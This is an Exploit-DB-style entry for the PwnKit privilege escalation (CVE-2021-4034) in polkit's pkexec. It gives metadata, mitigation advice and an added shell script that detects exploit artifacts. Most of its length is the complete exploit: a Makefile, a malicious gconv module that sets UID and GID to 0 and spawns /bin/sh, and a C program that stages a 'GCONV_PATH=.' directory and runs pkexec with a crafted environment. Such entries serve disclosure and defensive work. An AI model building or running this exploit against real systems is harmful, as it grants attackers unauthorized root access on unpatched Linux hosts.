Vendor: PolicyKit-1
Author: Lance Biggerstaff
CVSS: 7.8 (HIGH)
Type: Privilege Escalation
CWE: 269
Product Name: PolicyKit-1
Affected Version From: 0.105-31
Affected Version To: 0.105-31
Patch Exists: YES
Related CVE: CVE-2021-4034
CPE: a:polkit:policykit-1
Platforms Tested: Linux
Year: 2022

PolicyKit-1 0.105-31 – Privilege Escalation

The exploit consists of three files: `Makefile`, `evil-so.c` and `exploit.c`. The Makefile compiles evil-so.c into the shared object evil.so and exploit.c into the exploit binary. evil-so.c defines a gconv module whose initialisation routine sets the UID and GID to 0 and executes a shell. exploit.c creates a directory named `GCONV_PATH=.`, a second directory holding a gconv-modules file and a copy of evil.so, and then executes the pkexec binary with an empty argument list and an environment that points at that directory, so that evil.so is loaded as a gconv module and its code runs.

Mitigation:

Users should update PolicyKit-1 to the latest patched version and make sure that environment variables such as GCONV_PATH cannot be pointed at an attacker-controlled directory.
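The following script is an added defensive check, not part of the exploit or of the polkit project: it looks for the on-disk artifacts that exploit.c leaves behind (a directory literally named `GCONV_PATH=.` and a gconv-modules file outside the system iconv directories) and reports whether a pkexec binary still carries the setuid bit. It assumes a Linux host with GNU find and stat.

```shell
#!/bin/sh
# Added defensive check (not the original exploit code). Assumes GNU find/stat.

# Return 0 (true) if the tree under $1 contains exploit-style artifacts, else 1.
find_pwnkit_artifacts() {
    root="$1"
    found=1
    # A directory whose name is "GCONV_PATH=." has no legitimate reason to
    # exist; exploit.c creates one next to its staging directory.
    if find "$root" -type d -name 'GCONV_PATH=.' 2>/dev/null | grep -q .; then
        echo "suspicious directory named 'GCONV_PATH=.' under $root"
        found=0
    fi
    # gconv-modules files normally live only under the libc gconv directory;
    # one anywhere else is the loader configuration this exploit plants.
    unexpected=$(find "$root" -type f -name 'gconv-modules' \
        ! -path '/usr/lib/*' ! -path '/usr/lib64/*' ! -path '/lib/*' \
        2>/dev/null || true)
    if [ -n "$unexpected" ]; then
        echo "unexpected gconv-modules file(s):"
        echo "$unexpected"
        found=0
    fi
    return "$found"
}

# Return 0 (true) if the file at $1 (default /usr/bin/pkexec) is setuid and
# owned by root, which is the precondition for this bug; else return 1.
pkexec_is_setuid() {
    bin="${1:-/usr/bin/pkexec}"
    [ -u "$bin" ] && [ "$(stat -c %u "$bin" 2>/dev/null)" = "0" ]
}

# Usage: scan the directory given as the first argument (default /tmp).
if find_pwnkit_artifacts "${1:-/tmp}"; then
    echo "exploit artifacts found, investigate the host"
else
    echo "no exploit artifacts under ${1:-/tmp}"
fi
if pkexec_is_setuid; then
    echo "/usr/bin/pkexec is setuid root: confirm it is a patched build"
fi
```

A setuid pkexec is only a finding on an unpatched build; the Qualys advisory referenced above gives removing the setuid bit (chmod 0755 /usr/bin/pkexec) as the interim mitigation when updating is not yet possible.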

Exploit-DB raw data:

# Exploit Title: PolicyKit-1 0.105-31 - Privilege Escalation
# Exploit Author: Lance Biggerstaff
# Original Author: ryaagard (https://github.com/ryaagard)
# Date: 27-01-2022
# Github Repo: https://github.com/ryaagard/CVE-2021-4034
# References: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt

# Description: The exploit consists of three files `Makefile`, `evil-so.c` & `exploit.c`

##### Makefile #####

all:
	gcc -shared -o evil.so -fPIC evil-so.c
	gcc exploit.c -o exploit

clean:
	rm -r ./GCONV_PATH=. && rm -r ./evildir && rm exploit && rm evil.so

#################

##### evil-so.c #####

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <grp.h>      /* setgroups() */

/* The gconv loader looks up a gconv() symbol in every module it opens;
 * an empty body is enough to satisfy that lookup. */
void gconv() {}

/* gconv_init() is called by the loader when the module is opened. */
void gconv_init() {
    setuid(0);
    setgid(0);
    setgroups(0, NULL);   /* setgroups() takes (size, list), not a single int */

    char *const sh_argv[] = { "/bin/sh", NULL };
    execve("/bin/sh", sh_argv, NULL);
}

#################

##### exploit.c #####

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>   /* execve() */

#define BIN "/usr/bin/pkexec"
#define DIR "evildir"
#define EVILSO "evil"

int main()
{
    /* Environment handed to pkexec; the first entry is the staging directory
     * name rather than a KEY=VALUE pair. */
    char *envp[] = {
        DIR,
        "PATH=GCONV_PATH=.",
        "SHELL=ryaagard",
        "CHARSET=ryaagard",
        NULL
    };
    /* pkexec is executed with an empty argument list. */
    char *argv[] = { NULL };

    /* Stage the "GCONV_PATH=." directory, the gconv-modules file and evil.so. */
    system("mkdir GCONV_PATH=.");
    system("touch GCONV_PATH=./" DIR " && chmod 777 GCONV_PATH=./" DIR);
    system("mkdir " DIR);
    system("echo 'module\tINTERNAL\t\t\tryaagard//\t\t\t" EVILSO "\t\t\t2' > " DIR "/gconv-modules");
    system("cp " EVILSO ".so " DIR);

    execve(BIN, argv, envp);

    return 0;
}

#################